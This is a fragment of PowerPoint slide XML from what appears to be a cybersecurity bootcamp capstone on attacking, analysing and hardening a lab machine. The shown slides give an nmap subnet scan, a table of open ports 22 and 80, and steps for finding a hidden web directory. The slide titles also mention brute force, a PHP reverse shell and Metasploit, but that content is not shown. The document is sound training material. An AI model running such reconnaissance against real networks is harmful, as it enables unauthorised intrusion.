          <a:off x="952475" y="5905500"/>
          <a:ext cx="21995625" cy="2986950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{29D82A68-96A6-43CD-8B4E-EC5E3386A180}</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dirty="0"/>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1"/>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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4400" dirty="0"/>
                        <a:t>Port 22</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>Open SSH </a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" dirty="0"/>
                        <a:t>Vulnerable to be accessed as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
                        <a:t>ssh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" dirty="0"/>
                        <a:t> attack</a:t>
                      </a:r>
                      <a:endParaRPr sz="36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4400" dirty="0"/>
                        <a:t>Port 80 </a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>HTTP web interface</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>Vulnerable on HTTP attack </a:t>
                      </a:r>
                      <a:endParaRPr sz="44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63"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p89"/>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Discovering Vulnerability using NMAP </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1365" name="Google Shape;1365;p89"/>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1366" name="Google Shape;1366;p89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10561064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using the tool NMAP to discover the vulnerable machines on the network :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFED1ED-C03D-4E4A-95D4-D6A38D7B5B59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3030764"/>
            <a:ext cx="15078456" cy="8774140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB63E51-3FC8-4FA9-ACFF-62F6B514973E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17364456" y="3108960"/>
            <a:ext cx="5824728" cy="866851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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>From the Nmap scan we can see that ports 80 and 22 is open.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Shape 1370"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371" name="Google Shape;1371;p90"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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Locating the Secret Folder </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p90"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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1373" name="Google Shape;1373;p9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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open a web browser and type the IP address and navigate through different directories trying to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such as : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F90F66-0EE0-41E8-9D4D-E66131853BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1444751" y="3794760"/>
            <a:ext cx="10442449" cy="8750808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949C5823-ABB4-4E3B-A517-A1ADB440E63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12011025" y="3794760"/>
            <a:ext cx="11178160" cy="8750808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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1502</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>183</Paragraphs>
  <Slides>31</Slides>
  <Notes>22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31</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="48" baseType="lpstr">
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Poppins Medium</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>2_Custom Design</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis &amp; Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Infiltrating the Target</vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Discovering Vulnerability using NMAP </vt:lpstr>
      <vt:lpstr>Locating the Secret Folder </vt:lpstr>
      <vt:lpstr>Brute Force Attack </vt:lpstr>
      <vt:lpstr>Getting Access to the Secret Folder</vt:lpstr>
      <vt:lpstr>Connect to the target machine via WebDav</vt:lpstr>
      <vt:lpstr>Creating PHP reverse shell payload</vt:lpstr>
      <vt:lpstr>Exploit using Metasploit tool</vt:lpstr>
      <vt:lpstr>Compromise the Target Machine</vt:lpstr>
      <vt:lpstr>Exploitation: NAME OF THIRD VULNERABILITY</vt:lpstr>
      <vt:lpstr>Blue Team Analysing the Incident</vt:lpstr>
      <vt:lpstr>Kibana Analysis</vt:lpstr>
      <vt:lpstr>Kibana Analysis</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Find the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Identifying the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Identifying the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Find the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Identify the Reverse Shell Upload</vt:lpstr>
      <vt:lpstr>Mitigation Hardening the System</vt:lpstr>
      <vt:lpstr>Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Find the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Identifying the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Find the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Kibana Analysis: Identify the Reverse Shell Upload</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&amp; Hardening of a Vulnerable System</dc:title>
  <cp:lastModifiedBy>Erfan Al janaby</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-30T06:43:04Z</dcterms:modified>
</cp:coreProperties>
</file>